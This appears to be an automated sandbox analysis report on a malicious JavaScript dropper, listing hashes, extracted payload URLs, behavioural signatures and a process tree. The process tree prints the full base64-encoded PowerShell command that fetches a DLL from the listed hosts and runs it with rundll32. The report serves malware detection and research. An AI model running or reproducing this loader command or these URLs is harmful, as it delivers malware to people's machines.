Analysis
-
max time kernel
52s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
17-03-2023 16:26
Static task
static1
Behavioral task
behavioral1
Sample
voluptates.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
voluptates.js
Resource
win10v2004-20230220-en
General
-
Target
voluptates.js
-
Size
66KB
-
MD5
25178faee98f554ca8e8d60c3a4038e7
-
SHA1
a8f5756397fc927aa5f38a7f2252158136ae8b86
-
SHA256
a34d104fa2f3913f42fbfff2f603af35c611a7edef490ed02a6d736eb12190dd
-
SHA512
6225fb953376518f34914e9bfaa463952b8e7507377d4b99588bcca2fb14fa544fe038d96bbcbad938f756bfeeb62f37bbc989c3b99bfe2c7d966218f5b7d46f
-
SSDEEP
768:N/qeNP+G+1G0pHsHl60LSoX52aNhXLy5/x0RRcr6XrA/X0wEA/kh7tM5DUXNQY74:NCLxP0fkh6RrA/0+kh7tMydb4
Malware Config
Extracted
https://lamired.com/8FIz2P/1
https://accesstelematics.com/Ulo3MpM/1
https://kotogadang-pusako.com/MweGD/1
https://fondationjoelkrasso.org/rjzgP6/1
https://dimoparkhogar.com/7VQuf/1
https://laposadadeugartearequipa.com/NARKhE/1
https://earnforpak.com/CzIUp/1
https://cocovedaglobal.com/XBtcjkQ/1
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1264 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1368 wrote to memory of 1264 1368 wscript.exe 28 PID 1368 wrote to memory of 1264 1368 wscript.exe 28 PID 1368 wrote to memory of 1264 1368 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\voluptates.js1⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAdQBuAG8AYgBqAGUAYwB0AGkAbwBuAGEAYgBsAGUAbgBlAHMAcwBDAGgAZQBzAHQAZQByAGIAZQBkACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AbABhAG0AaQByAGUAZAAuAGMAbwBtAC8AOABGAEkAegAyAFAALwAxACwAaAB0AHQAcABzADoALwAvAGEAYwBjAGUAcwBzAHQAZQBsAGUAbQBhAHQAaQBjAHMALgBjAG8AbQAvAFUAbABvADMATQBwAE0ALwAxACwAaAB0AHQAcABzADoALwAvAGsAbwB0AG8AZwBhAGQAYQBuAGcALQBwAHUAcwBhAGsAbwAuAGMAbwBtAC8ATQB3AGUARwBEAC8AMQAsAGgAdAB0AHAAcwA6AC8ALwBmAG8AbgBkAGEAdABpAG8AbgBqAG8AZQBsAGsAcgBhAHMAcwBvAC4AbwByAGcALwByAGoAegBnAFAANgAvADEALABoAHQAdABwAHMAOgAvAC8AZABpAG0AbwBwAGEAcgBrAGgAbwBnAGEAcgAuAGMAbwBtAC8ANwBWAFEAdQBmAC8AMQAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcABvAHMAYQBkAGEAZABlAHUAZwBhAHIAdABlAGEAcgBlAHEAdQBpAHAAYQAuAGMAbwBtAC8ATgBBAFIASwBoAEUALwAxACwAaAB0AHQAcABzADoALwAvAGUAYQByAG4AZgBvAHIAcABhAGsALgBjAG8AbQAvAEMAegBJAFUAcAAvADEALABoAHQAdABwAHMAOgAvAC8AYwBvAGMAbwB2AGUAZABhAGcAbABvAGIAYQBsAC4AYwBvAG0ALwBYAEIAdABjAGoAawBRAC8AMQAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAHMAdABoAG0AYQB0AGkAYwBzACAAaQBuACAAJAB1AG4AbwBiAGoAZQBjAHQAaQBvAG4AYQBiAGwAZQBuAGUAcwBzAEMAaABlAHMAdABlAHIAYgBlAGQAKQAgAHsAdAByAHkAIAB7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAYQBzAHQAaABtAGEAdABpAGMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAUAByAGUAYwBlAGQAZQByAFQAcgBvAHAAbwBjAGEAaQBuAGUALgBkAGwAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFAAcgBlAGMAZQBkAGUAcgBUAHIAbwBwAG8AYwBhAGkAbgBlAC4AZABsAGwAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAUAByAGUAYwBlAGQAZQByAFQAcgBvAHAAbwBjAGEAaQBuAGUALgBkAGwAbAAsAFgAUwA4ADgAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAfQB9AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-